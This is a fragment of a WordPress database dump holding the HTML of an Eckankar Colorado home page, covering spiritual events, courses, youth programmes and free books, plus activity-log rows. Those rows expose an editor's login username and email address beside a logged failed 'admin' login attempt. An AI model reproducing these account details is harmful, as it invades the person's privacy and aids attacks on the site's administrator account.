font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236970,40275,'_message_key','post_updated'),(236971,40275,'_user_id','2'),(236972,40275,'_user_login','S8zhaBda'),(236973,40275,'_user_email','nada@zipnadanot.org'),(236974,40275,'_server_remote_addr','76.130.120.x'),(236975,40275,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236976,40276,'failed_username','admin'),(236977,40276,'server_http_user_agent','Mozilla/5.0'),(236978,40276,'_message_key','user_unknown_login_failed'),(236979,40276,'_server_remote_addr','20.168.8.x'),(236980,40277,'post_id','7160'),(236981,40277,'post_type','page'),(236982,40277,'post_title','Home'),(236983,40277,'post_prev_post_content','<?xml version=\"1.0\" standalone=\"no\"?>\r\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"wave\" style=\"transform:rotate(0deg); transition: 0.3s; margin-top: -80px;\" viewBox=\"0 0 1440 100\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\"><defs><linearGradient id=\"sw-gradient-0\" x1=\"0\" x2=\"0\" y1=\"1\" y2=\"0\"><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"0%\"/><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"100%\"/></linearGradient></defs><path style=\"transform:translate(0, 0px); opacity:1\" fill=\"url(#sw-gradient-0)\" d=\"M0,10L60,18.3C120,27,240,43,360,41.7C480,40,600,20,720,10C840,0,960,0,1080,5C1200,10,1320,20,1440,23.3C1560,27,1680,23,1800,20C1920,17,2040,13,2160,15C2280,17,2400,23,2520,23.3C2640,23,2760,17,2880,11.7C3000,7,3120,3,3240,6.7C3360,10,3480,20,3600,28.3C3720,37,3840,43,3960,50C4080,57,4200,63,4320,56.7C4440,50,4560,30,4680,26.7C4800,23,4920,37,5040,41.7C5160,47,5280,43,5400,48.3C5520,53,5640,67,5760,75C5880,83,6000,87,6120,80C6240,73,6360,57,6480,41.7C6600,27,6720,13,6840,15C6960,17,7080,33,7200,33.3C7320,33,7440,17,7560,10C7680,3,7800,7,7920,10C8040,13,8160,17,8280,21.7C8400,27,8520,33,8580,36.7L8640,40L8640,100L8580,100C8520,100,8400,100,8280,100C8160,100,8040,100,7920,100C7800,100,7680,100,7560,100C7440,100,7320,100,7200,100C7080,100,6960,100,6840,100C6720,100,6600,100,6480,100C6360,100,6240,100,6120,100C6000,100,5880,100,5760,100C5640,100,5520,100,5400,100C5280,100,5160,100,5040,100C4920,100,4800,100,4680,100C4560,100,4440,100,4320,100C4200,100,4080,100,3960,100C3840,100,3720,100,3600,100C3480,100,3360,100,3240,100C3120,100,3000,100,2880,100C2760,100,2640,100,2520,100C2400,100,2280,100,2160,100C2040,100,1920,100,1800,100C1680,100,1560,100,1440,100C1320,100,1200,100,1080,100C960,100,840,100,720,100C600,100,480,100,360,100C240,100,120,100,60,100L0,100Z\"/></svg>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" 